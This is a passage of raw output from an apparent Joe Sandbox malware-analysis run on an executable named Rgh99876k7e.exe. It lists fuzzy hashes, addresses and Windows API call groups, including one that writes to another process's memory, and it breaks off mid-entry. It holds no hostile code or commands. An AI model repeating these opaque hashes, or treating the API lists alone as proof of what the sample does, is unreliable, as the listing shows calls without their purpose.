                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
                          • Instruction ID: 1b57157041e44960103b6b35420731a5bbd2ec99b151f78b887a4aeb68879735
                          • Opcode Fuzzy Hash: 39ea12dd3f14ecf5d53e2e1389725d5c11cb66300b4fd8d80b84afb80cf714ad
                          • Instruction Fuzzy Hash: A5018C75C0162DDBCF00AFE4DC59AEDBB78FF08700F444546E902B2241DB38A552CBAA
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761136
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
                          • Instruction ID: 26c73b8724a671c7e43464384a0efd8558a5d8aa0008ce0d119aefb44f8a4b15
                          • Opcode Fuzzy Hash: 851cd19fea3fef4779da23a435afc2c0e0391966b93525844863d52fbaff84cb
                          • Instruction Fuzzy Hash: A4016DB5100209BFDF164FA8DC4DA6A3B6EEF86360B548416FA41C3360DA35DC018A64
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00760FEC
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
                          • Instruction ID: c0adc4e1f8c7a0f4420694b4bed655de35296beb4520531c28351f7ce224c024
                          • Opcode Fuzzy Hash: 553df3824c214b909a5e443d6513bc0ff05d701074401ba4d6a0fef1620ea6f6
                          • Instruction Fuzzy Hash: 67F0AF75200305ABDF220FA49C4DF563B6DEF89762F508415F906C6260CA38DC418A74
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076104C
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
                          • Instruction ID: ad2cee25be848d33688eeb3057e964273cc1a8fee30390d096416b350b82f010
                          • Opcode Fuzzy Hash: fb4b066347a8e166e3a46c7c89ee778b77a530657326a922d70fcf163223c187
                          • Instruction Fuzzy Hash: B2F0A975200305ABDF221FA8EC4DF5A3BADEF89761F604416FA06D6260CA38DC418AB4
                          APIs
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770324
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770331
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077033E
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 0077034B
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770358
                          • CloseHandle.KERNEL32(?,?,?,?,0077017D,?,007732FC,?,00000001,00742592,?), ref: 00770365
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
                          • Instruction ID: dfe2943836f4c49c9d06e1e13d91b4f8dcd448a820f078b4baf8d7ef3e852ade
                          • Opcode Fuzzy Hash: ebdbcfe4d45e3ef730c932cc4d436bdbc40e732c8c77cff889d0af54cdca52f7
                          • Instruction Fuzzy Hash: 2C019C72800B15DFCB30AF66D880812FBF9BE60255315CA3FD1AA52931C3B5A959CE80
                          APIs
                          • _free.LIBCMT ref: 0073D752
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073D764
                          • _free.LIBCMT ref: 0073D776
                          • _free.LIBCMT ref: 0073D788
                          • _free.LIBCMT ref: 0073D79A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
                          • Instruction ID: 1155688938b24818c16f9d41b674860600b52d2229e26b0035fffabe2363cc30
                          • Opcode Fuzzy Hash: 0f7c7b91eac1b67b488af50f17f74034a73cae5cca835e2db8b725a19bf61266
                          • Instruction Fuzzy Hash: F6F01272544214ABA632EB64F9C6D1677DDBB44710F954849F088E7513C73CFC818A68
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00765C58
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00765C6F
                          • MessageBeep.USER32(00000000), ref: 00765C87
                          • KillTimer.USER32(?,0000040A), ref: 00765CA3
                          • EndDialog.USER32(?,00000001), ref: 00765CBD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 7598c577eefd8b96c9313260008dd360abb13d19d2fd5d67f67e15f6c1ea7134
                          • Instruction ID: 65a0fdcf200f5befcfcb3ba78dc716bb6acaf75a7604794d8fff3c6f1a3870bf
                          • Opcode Fuzzy Hash: 7598c577eefd8b96c9313260008dd360abb13d19d2fd5d67f67e15f6c1ea7134
                          • Instruction Fuzzy Hash: 1501A470500B05AFEF215B10DD4EFA67BB8BF00B05F00565AB983A14E1DBF8A985DFA4
                          APIs
                          • _free.LIBCMT ref: 007322BE
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 007322D0
                          • _free.LIBCMT ref: 007322E3
                          • _free.LIBCMT ref: 007322F4
                          • _free.LIBCMT ref: 00732305
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
                          • Instruction ID: df48eb3e4f6d6a5878b1cc99f8155f394a8c22140b9c80b32a8cb46bd22c7971
                          • Opcode Fuzzy Hash: 661f96af4e5c3680bd714c86cae71c75b98891c3bf1cbd0f74da9ea614dadc6b
                          • Instruction Fuzzy Hash: 9DF017749021209B9612AF54BC05A093BB4F718760F51954FF454E22B3C73D2813AEEC
                          APIs
                          • EndPath.GDI32(?), ref: 007195D4
                          • StrokeAndFillPath.GDI32(?,?,007571F7,00000000,?,?,?), ref: 007195F0
                          • SelectObject.GDI32(?,00000000), ref: 00719603
                          • DeleteObject.GDI32 ref: 00719616
                          • StrokePath.GDI32(?), ref: 00719631
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
                          • Instruction ID: f2b7a26cccb8de5f3689981bff270d4ab6e72f28238e469197c8a381ed86f057
                          • Opcode Fuzzy Hash: 567492a8684b9e7c1cc928588a0ce04c68fe0aeb942fe05eabbd334f0a6a545a
                          • Instruction Fuzzy Hash: ABF03C30006248EBDB125F69ED2C7A43B71AB00322F44C216F565550F1D73CA9A3DF38
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __freea$_free
                          • String ID: a/p$am/pm
                          • API String ID: 3432400110-3206640213
                          • Opcode ID: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
                          • Instruction ID: 2c9fc70d297eff884a9360342e52b0b6c21ea40e8ed4a34fa911c7999a116f2a
                          • Opcode Fuzzy Hash: fd1a56832aab67a228f0992fac19d62ba7c414536e44f09cc688d1192acc4345
                          • Instruction Fuzzy Hash: 17D12871A00206CAFB289F68C895BFEB7B1FF06300FA44159E541AB653D37D9D80CB91
                          APIs
                            • Part of subcall function 00720242: EnterCriticalSection.KERNEL32(007D070C,007D1884,?,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072024D
                            • Part of subcall function 00720242: LeaveCriticalSection.KERNEL32(007D070C,?,0071198B,007D2518,?,?,?,007012F9,00000000), ref: 0072028A
                            • Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9
                          • __Init_thread_footer.LIBCMT ref: 00786238
                            • Part of subcall function 007201F8: EnterCriticalSection.KERNEL32(007D070C,?,?,00718747,007D2514), ref: 00720202
                            • Part of subcall function 007201F8: LeaveCriticalSection.KERNEL32(007D070C,?,00718747,007D2514), ref: 00720235
                            • Part of subcall function 0077359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4
                            • Part of subcall function 0077359C: LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                          • String ID: x#}$x#}$x#}
                          • API String ID: 1072379062-1301169260
                          • Opcode ID: 8f11cd0218400b222fdc41280157bed0c30a7fa7d264e05d903c0f7d399ff00d
                          • Instruction ID: dab5a4c20da58be2e86f1dfb7033c057a768fcbe7ebee37b370dc7db1d345292
                          • Opcode Fuzzy Hash: 8f11cd0218400b222fdc41280157bed0c30a7fa7d264e05d903c0f7d399ff00d
                          • Instruction Fuzzy Hash: 4AC17B71A40105EBDB14EF58C894EBEB7B9FF48310F108069FA45AB291DB78ED55CBA0
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00738B6E
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00738B7A
                          • __dosmaperr.LIBCMT ref: 00738B81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr
                          • String ID: .r
                          • API String ID: 2434981716-397233886
                          • Opcode ID: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
                          • Instruction ID: c313e61d10a250a0f4bd2ade40218e3f1216e87c8e1912833b5c6d1aadf8bd0d
                          • Opcode Fuzzy Hash: 1b211b90c26ee4d8fb117371172e26d45aefd3a7ac542dd3226104aac18483ec
                          • Instruction Fuzzy Hash: A2418EF0604256AFEB659F24C880A7DBFE5EB46300F2885AAF49487253DE3D8C029795
                          APIs
                            • Part of subcall function 0076B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621D0,?,?,00000034,00000800,?,00000034), ref: 0076B42D
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00762760
                            • Part of subcall function 0076B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0076B3F8
                            • Part of subcall function 0076B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0076B355
                            • Part of subcall function 0076B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B365
                            • Part of subcall function 0076B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00762194,00000034,?,?,00001004,00000000,00000000), ref: 0076B37B
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007627CD
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0076281A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
                          • Instruction ID: 208e77c049ecb1b68597838de09104ce7cb815b4c6e4bc41a880dc53a073ee93
                          • Opcode Fuzzy Hash: c57093eb8033d4e61e4376b8c2a701488e8339dbdf5d8449d492ee04ff7c4f31
                          • Instruction Fuzzy Hash: FD410D76900218AFDB11DFA4CD45EEEBBB8EF05700F108095FA56B7181DB746E85CB61
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Rgh99876k7e.exe,00000104), ref: 00731769
                          • _free.LIBCMT ref: 00731834
                          • _free.LIBCMT ref: 0073183E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\Rgh99876k7e.exe
                          • API String ID: 2506810119-2052860485
                          • Opcode ID: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
                          • Instruction ID: 7e7111094fae95308eef390ff526a10ba037a0c2cc977f81f1102a0265b3ea2a
                          • Opcode Fuzzy Hash: 00f59be5943c0b46d744ec857768301719f91e99f280843f202293c7579c2fc1
                          • Instruction Fuzzy Hash: FB318075A00218FFEB21DB999C85D9EBBFCEB85320F9481A7F40497212D6789E40CB94
                          APIs
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0076C306
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0076C34C
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007D1990,01916C88), ref: 0076C395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem
                          • String ID: 0
                          • API String ID: 135850232-4108050209
                          • Opcode ID: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
                          • Instruction ID: 5f790ca760f7de6e83541f336fd71f8fb40f6a9560314ba4222201cc5882d724
                          • Opcode Fuzzy Hash: dce16f70706a6135da34941cd71f3193ecc38f39be6728313d1f6945b4a7ce56
                          • Instruction Fuzzy Hash: BE418F31204301DFD721DF26D845B6ABBE8AB85310F14861EFDA6973D1D738E905CB66
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0079CC08,00000000,?,?,?,?), ref: 007944AA
                          • GetWindowLongW.USER32 ref: 007944C7
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007944D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
                          • Instruction ID: 66163adec5f6de781a20d3ea8c9ef4accb94100de98550cd01d21553feeff915
                          • Opcode Fuzzy Hash: d69862c42d5e352b453bfd6e558d5870cbbd79edd3135ad2b9384a276de11222
                          • Instruction Fuzzy Hash: C131DE31200205AFDF218E78EC45FEA7BA9EB08334F204319F979921E0D778EC629B50
                          APIs
                          • SysReAllocString.OLEAUT32(?,?), ref: 00766EED
                          • VariantCopyInd.OLEAUT32(?,?), ref: 00766F08
                          • VariantClear.OLEAUT32(?), ref: 00766F12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyString
                          • String ID: *jv
                          • API String ID: 2173805711-3975105792
                          • Opcode ID: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
                          • Instruction ID: c007abb9606d954757dbf04d006de9c68d5a179965a4423b35d81b5012ae2758
                          • Opcode Fuzzy Hash: dd6e226a1ef5316e45fe74caea179f12bd292da965113b276bd6e1c710efcab7
                          • Instruction Fuzzy Hash: F531AD72604245DBCB05AFA4E8959FE37B6FF84704B5005ADF8035B2A1CB3C9E12DB94
                          APIs
                            • Part of subcall function 0078335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00783077,?,?), ref: 00783378
                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                          • _wcslen.LIBCMT ref: 0078309B
